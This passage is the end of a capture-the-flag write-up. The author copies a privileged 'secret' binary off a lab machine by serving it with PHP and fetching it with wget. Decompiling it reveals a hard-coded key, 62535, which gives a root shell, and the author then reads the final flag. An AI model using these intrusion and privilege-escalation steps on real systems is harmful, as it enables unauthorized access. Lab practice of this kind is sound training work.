We figured we would have to reverse engineer the secret binary to obtain a valid key. To do that we copy the file to our own system by serving its directory with PHP's built-in web server.
pwd
php -S 0.0.0.0:8080
With the file being served, we download it onto our attacker machine using wget.
wget http://192.168.0.110:8080/secret
ls
Privilege Escalation
Now we used Ghidra to decompile the binary and look at the value our input is compared against. Whatever we enter as the secret key is compared with the constant 0xf447. All we need is the decimal equivalent of that number.
We used the shell's arithmetic expansion to convert the value found in the secret binary to decimal, giving the secret key: "62535".
echo $((0xf447))
With the secret key in hand we went back to our SSH session and ran the secret binary again. We entered the value and the shell was elevated to root.
Reading the Flag
We looked in the root user's Desktop directory and found a text file named local.txt, which turns out to be the final flag of this machine.
./secret
62535
whoami
cd /root/Desktop
cat local.txt
This concludes the lab. A huge shout out to the lab author for creating this lab. From the look of it, the lab must have taken some effort and time. I would like to thank the author for investing his/her resources for my learning.